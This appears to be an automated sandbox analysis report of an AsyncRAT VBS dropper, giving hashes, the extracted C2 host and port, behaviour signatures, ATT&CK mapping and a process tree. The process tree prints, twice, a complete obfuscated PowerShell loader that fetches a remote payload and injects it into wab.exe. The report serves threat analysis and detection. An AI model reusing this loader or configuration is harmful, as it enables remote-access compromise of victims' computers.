asyncrat | ca073831a8671f0d5cc9f0149c43b58be3d92b4a7b5a39235b1547acd2e5de28

General

Target

ca073831a8671f0d5cc9f0149c43b58be3d92b4a7b5a39235b1547acd2e5de28.vbs
Size

897KB
MD5

5964d98cf06acef50055252add1acc74
SHA1

4fc5206d256394d7e6c9b3fb648bad6e0f714058
SHA256

ca073831a8671f0d5cc9f0149c43b58be3d92b4a7b5a39235b1547acd2e5de28
SHA512

9477633a7073c2753c1df75b6321d8d1b43158c83607e5f0fab69463fb67602eaae708b0c27c0087185cd46c90f9024ac4ded03a38cf91c8154cc771c9a3d29a
SSDEEP

12288:qzTzUyR7hSRac+qkLmttaGgMskgqoiMHsp9NH:UXh+k+taGKqoJONH

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

dhhj.duckdns.org:8797

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

5 2516 powershell.exe
7 2516 powershell.exe
9 2516 powershell.exe
11 2516 powershell.exe
13 2516 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2212 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

284 powershell.exe
2212 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 284 set thread context of 2212 284 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

2516 powershell.exe
284 powershell.exe
284 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

284 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2516 powershell.exe
Token: SeDebugPrivilege 284 powershell.exe
Token: SeDebugPrivilege 2212 wab.exe

flow	pid	process
5	2516	powershell.exe
7	2516	powershell.exe
9	2516	powershell.exe
11	2516	powershell.exe
13	2516	powershell.exe

pid	process
2212	wab.exe

pid	process
284	powershell.exe
2212	wab.exe

description	pid	process	target process
PID 284 set thread context of 2212	284	powershell.exe	wab.exe

pid	process
2516	powershell.exe
284	powershell.exe
284	powershell.exe

pid	process
284	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2516	powershell.exe
Token: SeDebugPrivilege	284	powershell.exe
Token: SeDebugPrivilege	2212	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2020 wrote to memory of 2516	2020	WScript.exe	powershell.exe
PID 2020 wrote to memory of 2516	2020	WScript.exe	powershell.exe
PID 2020 wrote to memory of 2516	2020	WScript.exe	powershell.exe
PID 2516 wrote to memory of 2780	2516	powershell.exe	cmd.exe
PID 2516 wrote to memory of 2780	2516	powershell.exe	cmd.exe
PID 2516 wrote to memory of 2780	2516	powershell.exe	cmd.exe
PID 2516 wrote to memory of 284	2516	powershell.exe	powershell.exe
PID 2516 wrote to memory of 284	2516	powershell.exe	powershell.exe
PID 2516 wrote to memory of 284	2516	powershell.exe	powershell.exe
PID 2516 wrote to memory of 284	2516	powershell.exe	powershell.exe
PID 284 wrote to memory of 1872	284	powershell.exe	cmd.exe
PID 284 wrote to memory of 1872	284	powershell.exe	cmd.exe
PID 284 wrote to memory of 1872	284	powershell.exe	cmd.exe
PID 284 wrote to memory of 1872	284	powershell.exe	cmd.exe
PID 284 wrote to memory of 2212	284	powershell.exe	wab.exe
PID 284 wrote to memory of 2212	284	powershell.exe	wab.exe
PID 284 wrote to memory of 2212	284	powershell.exe	wab.exe
PID 284 wrote to memory of 2212	284	powershell.exe	wab.exe
PID 284 wrote to memory of 2212	284	powershell.exe	wab.exe
PID 284 wrote to memory of 2212	284	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ca073831a8671f0d5cc9f0149c43b58be3d92b4a7b5a39235b1547acd2e5de28.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retrofleksion = 1;$Bambustppets='Sub';$Bambustppets+='strin';$Bambustppets+='g';Function Konomigruppens($Morbror){$retablerings=$Morbror.Length-$Retrofleksion;For($Upaaagtet=5;$Upaaagtet -lt $retablerings;$Upaaagtet+=6){$ubehersket+=$Morbror.$Bambustppets.Invoke( $Upaaagtet, $Retrofleksion);}$ubehersket;}function Spinatens($Solskinsvejrets){& ($Vaivode) ($Solskinsvejrets);}$Logometrical=Konomigruppens ' OutpM SawmoBrug.zHemo,i Pe hl oncelLy phaHyper/Turis5S.aan. So.i0Assem Unexp(Ta reWforduiSmaasnToprodInsatoU.ennwAfva.s Per, PropNIde,lT Tilr Velpl1Bonus0Af.an. Ar,e0Sekre;Angst TelefWPseudiF rmin i,gr6Syges4Spino;Ritr, Amtslx Sel 6 Mass4 Bili;Ath n Ref.rTrykkvNon.u: Prci1Pro e2tra.d1ramle.Marmo0Miljf) sans DiantGUsseleFlyt.cBraktkHalvdoS,yre/Brems2Darkh0Lob,y1Recre0Eg,et0Smerg1Tidsh0 Pheo1Amatr synteFNorm,i LaanrHydraeFlskefUndlioLogfix Skem/W.bst1 Li,i2Unlik1Frihe.Demen0Inequ ';$Shroffs150=Konomigruppens 'UngeoU Snoos LgemeCaffarUfors-MegapAEnspogapocaeFortrnBloketAfste ';$Hreapparats=Konomigruppens 'DaltohGu.ertUndertReserpFu.ktsD.tai:Atry./alvil/Permaw SurpwC tupwRutte.D,adcs NanieArthrnBeefidbukkes.tyrepPorteapr.coc Feu e ,nti.EjakucNonproS.andm.okol/U.mopp,nkvir Kapio Maal/AnimedJimigl Elox/Rmn,ngLof s2R,gnsj ExtrsKo.ve9Udrev1Fuldm ';$Valenser=Konomigruppens 'O.dre>,nees ';$Vaivode=Konomigruppens 'FluidiEle.ieGratux inte ';$Annulusesosaurus='Fletch';$Annuluses = Konomigruppens 'UdmuneNo,thcFeu.ahsoftwoGrunt Horo%CobolaCystopSer ip VegedFrskhaA.okatDishuaUninw%Post,\Brak k ideaStocknTrocatAleatoMultinForesn S.ileHardwmS mimee,tusn ka,stSkke,eBeanbrFremmsK beh.MisprR.emmaeWo,llp Anre O,rin&Klist& Wild ForefeG,mnacRecr.hovergo We.t PhilatPanto ';Spinatens (Konomigruppens 'Psykt$ MoragLoddelProgroR,ddeb KresaForpalallay:BackhT Parie IntekMikadsFlount BlaalStikksopslinRampoiEp.cen PromgK,ple=S lin(Slidlc nhabmAfskrdAsm,n Er,th/BanagcUdskl Rente$ udlAGodtfncoumanS.ovrulogoclUnex.uRynkesHaulseCop.os H,em) Croj ');Spinatens (Konomigruppens 'Abio.$Villag Moskl,aguno ,rkebSkrifaEscallDibst:ForetaOst ofSteinbUnsaplMygaleDatamgSeque=,pora$ DataHB blirDksskeUngr,aTilslpUnferpHy,eraDiffrrGalopa Pe ftbrneps ett. wan.sTranspD.odelBa,kkiSubert Butt(Bevge$AsterVrelataW.nnilRovdrePyramn teiss Bacte ro,lrSeism) O,ra ');$Hreapparats=$afbleg[0];$Dumpingprisen= (Konomigruppens 'Hogma$Trykng ,ngilBrndtoUgr,sbUnproa.rzrulSkint:KerneB E fliHijacdReprorGldelabeboegOrbicy In.edKn,cke KrlirDi,kinMinuteHjdessAfdel=,rassNDollyeFoliewPluvi- .iltOBortlbHovedjslagte stuecMod,rt .nne G.undSNonsoy .imbsUnregtddsaaeT.riamArist.Er ndNKej,eeAfslatAndro.knsliWS.atie TheebInd.kC .ovel,igroiTornaeRevelnToldat');$Dumpingprisen+=$Tekstlsning[1];Spinatens ($Dumpingprisen);Spinatens (Konomigruppens '.ppre$.alteBS.arbiban ld athrr DebaaAflirg ormaytriumdSuspee WitnrOver.nAutumeRegnssExhib. WaldHC.iffeAporoapreacd romueCo.terMonatsB,gen[Urneg$DenudS,jernhFlugtr SkivoFlytnfprogrfDrypnsSubje1Myrme5 Lini0 Kari]Anti,=So.od$DukkeL SaucoUnexpgImpuloSaa rmOpinieFred,tPoul.rEburniRaavacJe,osa KramlGenne ');$Lokalernes=Konomigruppens 'Udelt$VerkrBgusheiDy,frd NaturHoppeaVi ylgTillgyWhaledcylineFugtpr j stnSkul e BoxbsTrivi.TermiDLakrioopkalwGravinTjenel AffaoScholaFredsdC.esuFRu,oliH,logl RecaeUnnam(Bugfi$CentrHForsvrEnokpeSk.gga P,eapClavipTyskeaHawairAl,ehaSub etLynnesExcit,They $DokumEUnloafNannytStauneSvensrPach bVildne JesytArranaDaglilSignaiNomadnFejlrgDeste)Lufti ';$Efterbetaling=$Tekstlsning[0];Spinatens (Konomigruppens 'Fl ri$Ro lugB.omslStre oforkvbSaddlaSemillSmalf:TailsPSkylde,rydnnStifftth,mbaTyl ecreappa,statpCutlas Lousu ssul Sp.raTel urVarte=Acicu(PotamTHone eTich s Adeqt K gg-Bro.zPp lycaFinistKlipphEngob Omvis$Sam eEFrikafpube tSis,fe GennrS lksbFr gteS,rtkt LambatumbllEnestiTjr hnwoodwgToldp),maln ');while (!$Pentacapsular) {Spinatens (Konomigruppens 'Indf.$.limegVa.dilRegenoRovf.bO.vekaL,erul Beha:hyletOLat,evV.rdeeInforrClaritNosite centgTotipnFagsse AugunF.rvrdslgtseMlleh=Sexce$RoebetEpisirStorpuStv,oeKolon ') ;Spinatens $Lokalernes;Spinatens (Konomigruppens 'HagleSKar.ot.lanbaSubrirB.ttetly ch-Or.itSSplitl.agabeBieste cacap V.gi Flosk4 Tils ');Spinatens (Konomigruppens ' fid$Ca frgUnprelC,oiroordr,b Ex.uametrol,undk:CausaPW,dineise kn timetAdopta CorocBe reaIsomopBorges rmolu TabulSem,da ransrH,per=Bered(DagvoTUdplyeSkil.sScle tEnqui- Fr,sPPartiaUl.kktBaareh Rif, Macar$FlaskELnninfUnprot OrcheBruisr.illebA.tireSendetkotypaFunktlTuitiiBeachnCuritgSikke)Fortr ') ;Spinatens (Konomigruppens ' Or,n$Bal agK.arllBivogoFre.ebForgraTota lBjerg:Stor.P oriaPaakrtPr,syeRe.itn serotKo,cee Nonpr undanBaldrePri isWinal=Natur$Wa.legTaxwil .dlboCoa fb C rcaLrredlGudmo:ImbibCVenuloB usemkolonpFal.suPhototFestmeForesrTin.ep icisrEndolo ,ukkb.nderl ProveUpticmNonpreAntihrOutdwnSyvaaeGen,eshyp,z+Indsk+ fspn%Anony$Boltsa Fastf ConvbNo prlKvivaeSheikg.nnei.EtikecEfteroBreasuEugennBacketAntia ') ;$Hreapparats=$afbleg[$Patenternes];}$Personalhistoriers=309626;$Motiverings59=27930;Spinatens (Konomigruppens ' Sk,n$Con,igVirusl Munio yrobbAfproaKeefelE ico:BagklRSnowbeSchizt GunasTrooskForr rMast iClashvFlikfnL kkai,alernBarbagPiehos IlanrSttedeConsifBagf.o Ch.mrReunim I.pr Avls.=S ole VoldGUtryge B tttUpaal-,vertCRidgiom,tapn Uti tPilafeGlucon PaagtGataa Robot$SpndsEFattefHeltitOverreBlndrr d.nsbBasipeNgl.stRho baGrowelFru,tiBehagnTelexgGreen ');Spinatens (Konomigruppens ' Glis$Tor.eg.ensil PreaoMi,jab .ernaJaghilVi,er:DefekSUdspea Vesib BagwbHulkoaSchizt Pa.aiBrys c BeataAfg,nlChima Oakla= Hybr aive[stiliSNicolyByggesStamptContoeMortamSamme.evighCDev lo MuldnLeverv ,edbe ForerRumantSkate].eade: Heir:Cy.laFVidvir.xpenostivnmlaundB.udgea Run,sS.raseBuckt6Etymo4Jule S DeentApororInteriKriminMisfigAfstn(S ave$Cam zRCoasse spectAmylisCruzik ,estrPurpuiMoi tvCaustn Linci.ooidnObtrugFaradsCacatr T,abeBars fPaatroSantarBr,bemInkam)Penge ');Spinatens (Konomigruppens ' Bort$ChrisgKunstlUdvi oPremibFerieaSkulelslack:BallaFUdlevoCigarr.altua.lmuer skomg KonveMakullHftetsOrgane Elodr Sk.anuncone MaxisCoass2Over,4Paak 1 uksu Runni=.crit Vink[S.vanSAwastySupersDecentTrib,eslgtrmPneum. ecimT VidteRiv lx cirktOutre.Si,naESwagbnUng lcRetsfoAreoldMelaniMorianDysu.g Resc]Rosew:Archi: Ly.tA OverS A.coCP.ickIKonteIDesti.NutgrGDiseneFab,itVe,ruSEctr,tPitaurDrifti.redenPlancg Back( Kryd$QuinqSkrigsa CarbbNyhedb.emeda PolotPe,tliBrne cUnelea Fo,bl Hapu) Hy.o ');Spinatens (Konomigruppens 'Melan$SociagRatifl AfwioR.nkeb VandaF dhvl Plai: MyceU B,sknFilkowItacoaStabetFladecSwifth StokfKlenau avel rupinVanniekon.rsOttetsafsme= den$ SsonFOpfrso FerrrEtwita YderrFev rgDys.deCataclFlammsFerrie EpisrSej in arreUnmetsTrian2Unass4Tegne1Bison.DroitsSoneduMiracbBuksesawanhtProhyrSt,rmiTilbjnHurragBrugb(Rnneb$ ekrePGartnes,licrPyrogs SamtoMas rnVisc aPlanslRefurhLe.meiO,stdsErecht,odkeoUnderrMatchiSubdue DelerGr sbsPalma,Runds$Evig,MVandsoSka,ntExtusiFunktvPanegeSlikkrtra.siUretmnGtevigPostvsinstr5 Afla9Sandk)Floor ');Spinatens $Unwatchfulness;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2516

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kantonnementers.Rep && echo t"
3⤵
PID:2780

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retrofleksion = 1;$Bambustppets='Sub';$Bambustppets+='strin';$Bambustppets+='g';Function Konomigruppens($Morbror){$retablerings=$Morbror.Length-$Retrofleksion;For($Upaaagtet=5;$Upaaagtet -lt $retablerings;$Upaaagtet+=6){$ubehersket+=$Morbror.$Bambustppets.Invoke( $Upaaagtet, $Retrofleksion);}$ubehersket;}function Spinatens($Solskinsvejrets){& ($Vaivode) ($Solskinsvejrets);}$Logometrical=Konomigruppens ' OutpM SawmoBrug.zHemo,i Pe hl oncelLy phaHyper/Turis5S.aan. So.i0Assem Unexp(Ta reWforduiSmaasnToprodInsatoU.ennwAfva.s Per, PropNIde,lT Tilr Velpl1Bonus0Af.an. Ar,e0Sekre;Angst TelefWPseudiF rmin i,gr6Syges4Spino;Ritr, Amtslx Sel 6 Mass4 Bili;Ath n Ref.rTrykkvNon.u: Prci1Pro e2tra.d1ramle.Marmo0Miljf) sans DiantGUsseleFlyt.cBraktkHalvdoS,yre/Brems2Darkh0Lob,y1Recre0Eg,et0Smerg1Tidsh0 Pheo1Amatr synteFNorm,i LaanrHydraeFlskefUndlioLogfix Skem/W.bst1 Li,i2Unlik1Frihe.Demen0Inequ ';$Shroffs150=Konomigruppens 'UngeoU Snoos LgemeCaffarUfors-MegapAEnspogapocaeFortrnBloketAfste ';$Hreapparats=Konomigruppens 'DaltohGu.ertUndertReserpFu.ktsD.tai:Atry./alvil/Permaw SurpwC tupwRutte.D,adcs NanieArthrnBeefidbukkes.tyrepPorteapr.coc Feu e ,nti.EjakucNonproS.andm.okol/U.mopp,nkvir Kapio Maal/AnimedJimigl Elox/Rmn,ngLof s2R,gnsj ExtrsKo.ve9Udrev1Fuldm ';$Valenser=Konomigruppens 'O.dre>,nees ';$Vaivode=Konomigruppens 'FluidiEle.ieGratux inte ';$Annulusesosaurus='Fletch';$Annuluses = Konomigruppens 'UdmuneNo,thcFeu.ahsoftwoGrunt Horo%CobolaCystopSer ip VegedFrskhaA.okatDishuaUninw%Post,\Brak k ideaStocknTrocatAleatoMultinForesn S.ileHardwmS mimee,tusn ka,stSkke,eBeanbrFremmsK beh.MisprR.emmaeWo,llp Anre O,rin&Klist& Wild ForefeG,mnacRecr.hovergo We.t PhilatPanto ';Spinatens (Konomigruppens 'Psykt$ MoragLoddelProgroR,ddeb KresaForpalallay:BackhT Parie IntekMikadsFlount BlaalStikksopslinRampoiEp.cen PromgK,ple=S lin(Slidlc nhabmAfskrdAsm,n Er,th/BanagcUdskl Rente$ udlAGodtfncoumanS.ovrulogoclUnex.uRynkesHaulseCop.os H,em) Croj ');Spinatens (Konomigruppens 'Abio.$Villag Moskl,aguno ,rkebSkrifaEscallDibst:ForetaOst ofSteinbUnsaplMygaleDatamgSeque=,pora$ DataHB blirDksskeUngr,aTilslpUnferpHy,eraDiffrrGalopa Pe ftbrneps ett. wan.sTranspD.odelBa,kkiSubert Butt(Bevge$AsterVrelataW.nnilRovdrePyramn teiss Bacte ro,lrSeism) O,ra ');$Hreapparats=$afbleg[0];$Dumpingprisen= (Konomigruppens 'Hogma$Trykng ,ngilBrndtoUgr,sbUnproa.rzrulSkint:KerneB E fliHijacdReprorGldelabeboegOrbicy In.edKn,cke KrlirDi,kinMinuteHjdessAfdel=,rassNDollyeFoliewPluvi- .iltOBortlbHovedjslagte stuecMod,rt .nne G.undSNonsoy .imbsUnregtddsaaeT.riamArist.Er ndNKej,eeAfslatAndro.knsliWS.atie TheebInd.kC .ovel,igroiTornaeRevelnToldat');$Dumpingprisen+=$Tekstlsning[1];Spinatens ($Dumpingprisen);Spinatens (Konomigruppens '.ppre$.alteBS.arbiban ld athrr DebaaAflirg ormaytriumdSuspee WitnrOver.nAutumeRegnssExhib. WaldHC.iffeAporoapreacd romueCo.terMonatsB,gen[Urneg$DenudS,jernhFlugtr SkivoFlytnfprogrfDrypnsSubje1Myrme5 Lini0 Kari]Anti,=So.od$DukkeL SaucoUnexpgImpuloSaa rmOpinieFred,tPoul.rEburniRaavacJe,osa KramlGenne ');$Lokalernes=Konomigruppens 'Udelt$VerkrBgusheiDy,frd NaturHoppeaVi ylgTillgyWhaledcylineFugtpr j stnSkul e BoxbsTrivi.TermiDLakrioopkalwGravinTjenel AffaoScholaFredsdC.esuFRu,oliH,logl RecaeUnnam(Bugfi$CentrHForsvrEnokpeSk.gga P,eapClavipTyskeaHawairAl,ehaSub etLynnesExcit,They $DokumEUnloafNannytStauneSvensrPach bVildne JesytArranaDaglilSignaiNomadnFejlrgDeste)Lufti ';$Efterbetaling=$Tekstlsning[0];Spinatens (Konomigruppens 'Fl ri$Ro lugB.omslStre oforkvbSaddlaSemillSmalf:TailsPSkylde,rydnnStifftth,mbaTyl ecreappa,statpCutlas Lousu ssul Sp.raTel urVarte=Acicu(PotamTHone eTich s Adeqt K gg-Bro.zPp lycaFinistKlipphEngob Omvis$Sam eEFrikafpube tSis,fe GennrS lksbFr gteS,rtkt LambatumbllEnestiTjr hnwoodwgToldp),maln ');while (!$Pentacapsular) {Spinatens (Konomigruppens 'Indf.$.limegVa.dilRegenoRovf.bO.vekaL,erul Beha:hyletOLat,evV.rdeeInforrClaritNosite centgTotipnFagsse AugunF.rvrdslgtseMlleh=Sexce$RoebetEpisirStorpuStv,oeKolon ') ;Spinatens $Lokalernes;Spinatens (Konomigruppens 'HagleSKar.ot.lanbaSubrirB.ttetly ch-Or.itSSplitl.agabeBieste cacap V.gi Flosk4 Tils ');Spinatens (Konomigruppens ' fid$Ca frgUnprelC,oiroordr,b Ex.uametrol,undk:CausaPW,dineise kn timetAdopta CorocBe reaIsomopBorges rmolu TabulSem,da ransrH,per=Bered(DagvoTUdplyeSkil.sScle tEnqui- Fr,sPPartiaUl.kktBaareh Rif, Macar$FlaskELnninfUnprot OrcheBruisr.illebA.tireSendetkotypaFunktlTuitiiBeachnCuritgSikke)Fortr ') ;Spinatens (Konomigruppens ' Or,n$Bal agK.arllBivogoFre.ebForgraTota lBjerg:Stor.P oriaPaakrtPr,syeRe.itn serotKo,cee Nonpr undanBaldrePri isWinal=Natur$Wa.legTaxwil .dlboCoa fb C rcaLrredlGudmo:ImbibCVenuloB usemkolonpFal.suPhototFestmeForesrTin.ep icisrEndolo ,ukkb.nderl ProveUpticmNonpreAntihrOutdwnSyvaaeGen,eshyp,z+Indsk+ fspn%Anony$Boltsa Fastf ConvbNo prlKvivaeSheikg.nnei.EtikecEfteroBreasuEugennBacketAntia ') ;$Hreapparats=$afbleg[$Patenternes];}$Personalhistoriers=309626;$Motiverings59=27930;Spinatens (Konomigruppens ' Sk,n$Con,igVirusl Munio yrobbAfproaKeefelE ico:BagklRSnowbeSchizt GunasTrooskForr rMast iClashvFlikfnL kkai,alernBarbagPiehos IlanrSttedeConsifBagf.o Ch.mrReunim I.pr Avls.=S ole VoldGUtryge B tttUpaal-,vertCRidgiom,tapn Uti tPilafeGlucon PaagtGataa Robot$SpndsEFattefHeltitOverreBlndrr d.nsbBasipeNgl.stRho baGrowelFru,tiBehagnTelexgGreen ');Spinatens (Konomigruppens ' Glis$Tor.eg.ensil PreaoMi,jab .ernaJaghilVi,er:DefekSUdspea Vesib BagwbHulkoaSchizt Pa.aiBrys c BeataAfg,nlChima Oakla= Hybr aive[stiliSNicolyByggesStamptContoeMortamSamme.evighCDev lo MuldnLeverv ,edbe ForerRumantSkate].eade: Heir:Cy.laFVidvir.xpenostivnmlaundB.udgea Run,sS.raseBuckt6Etymo4Jule S DeentApororInteriKriminMisfigAfstn(S ave$Cam zRCoasse spectAmylisCruzik ,estrPurpuiMoi tvCaustn Linci.ooidnObtrugFaradsCacatr T,abeBars fPaatroSantarBr,bemInkam)Penge ');Spinatens (Konomigruppens ' Bort$ChrisgKunstlUdvi oPremibFerieaSkulelslack:BallaFUdlevoCigarr.altua.lmuer skomg KonveMakullHftetsOrgane Elodr Sk.anuncone MaxisCoass2Over,4Paak 1 uksu Runni=.crit Vink[S.vanSAwastySupersDecentTrib,eslgtrmPneum. ecimT VidteRiv lx cirktOutre.Si,naESwagbnUng lcRetsfoAreoldMelaniMorianDysu.g Resc]Rosew:Archi: Ly.tA OverS A.coCP.ickIKonteIDesti.NutgrGDiseneFab,itVe,ruSEctr,tPitaurDrifti.redenPlancg Back( Kryd$QuinqSkrigsa CarbbNyhedb.emeda PolotPe,tliBrne cUnelea Fo,bl Hapu) Hy.o ');Spinatens (Konomigruppens 'Melan$SociagRatifl AfwioR.nkeb VandaF dhvl Plai: MyceU B,sknFilkowItacoaStabetFladecSwifth StokfKlenau avel rupinVanniekon.rsOttetsafsme= den$ SsonFOpfrso FerrrEtwita YderrFev rgDys.deCataclFlammsFerrie EpisrSej in arreUnmetsTrian2Unass4Tegne1Bison.DroitsSoneduMiracbBuksesawanhtProhyrSt,rmiTilbjnHurragBrugb(Rnneb$ ekrePGartnes,licrPyrogs SamtoMas rnVisc aPlanslRefurhLe.meiO,stdsErecht,odkeoUnderrMatchiSubdue DelerGr sbsPalma,Runds$Evig,MVandsoSka,ntExtusiFunktvPanegeSlikkrtra.siUretmnGtevigPostvsinstr5 Afla9Sandk)Floor ');Spinatens $Unwatchfulness;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:284

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kantonnementers.Rep && echo t"
4⤵
PID:1872

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
2cd6d3fd2a40857e04d27aee77fe95a3

SHA1
3f43ff8a60fde03518946a7a73862f330edb9591

SHA256
b9da38b0c7711d543a859d7e3594f2779a44ef61444695ad2b7e561e18d660df

SHA512
f7c3819cbce602617c1f80259d6a423a5cb10e2e786c0be10fa02a5ca51fdfda1815a77ed7128680d36aa4f4667ab85999b4331df40c497d7d4d4a7ce9b08152

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar966D.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NJGI16GPYQG7VJE570E4.temp
Filesize
7KB

MD5
62dfd8fdd2d2e2dde1904546a4cdbd86

SHA1
815a3104c3a38a9964bca7e1c914d41ca1dcd665

SHA256
2eb1918de1b670197968719f0a42f0e8840d61350b64a8fdb1311d04dc53e4fb

SHA512
d610e59561cc56c8054029a34ae2b4880ade5da03c724aba6fb99ed87d240aa396a2f8765a4b7adf64dbcdbb6f79e9aa7ac4507ab60881d09e4a57221a8d06a1

Download Submit
C:\Users\Admin\AppData\Roaming\kantonnementers.Rep
Filesize
439KB

MD5
54cf091a3bc7cf004b14df5a70f13d1e

SHA1
67a132607bb94fccb4024b97718b0bd41d7004ca

SHA256
b9bde21759f81a0ffb7ebf57b131a553e39af00af68fc933c18ced6e0dd89d69

SHA512
651957938fcfe6a627d6b55b521b879b2eb8ebf7a84a91025fa444c14940259ac5ed7ac0a03d9daec845531b4cac87e6709c2266919eebdbb3a292045af21a6c

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/284-61-0x00000000065C0000-0x00000000081F6000-memory.dmp

Filesize
28.2MB

Download
memory/2212-90-0x0000000000320000-0x0000000000332000-memory.dmp

Filesize
72KB

Download
memory/2212-88-0x0000000000320000-0x0000000001382000-memory.dmp

Filesize
16.4MB

Download
memory/2516-8-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

Filesize
9.6MB

Download
memory/2516-14-0x000007FEF566E000-0x000007FEF566F000-memory.dmp

Filesize
4KB

Download
memory/2516-13-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

Filesize
9.6MB

Download
memory/2516-10-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

Filesize
9.6MB

Download
memory/2516-9-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

Filesize
9.6MB

Download
memory/2516-4-0x000007FEF566E000-0x000007FEF566F000-memory.dmp

Filesize
4KB

Download
memory/2516-7-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

Filesize
9.6MB

Download
memory/2516-6-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/2516-89-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

Filesize
9.6MB

Download
memory/2516-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing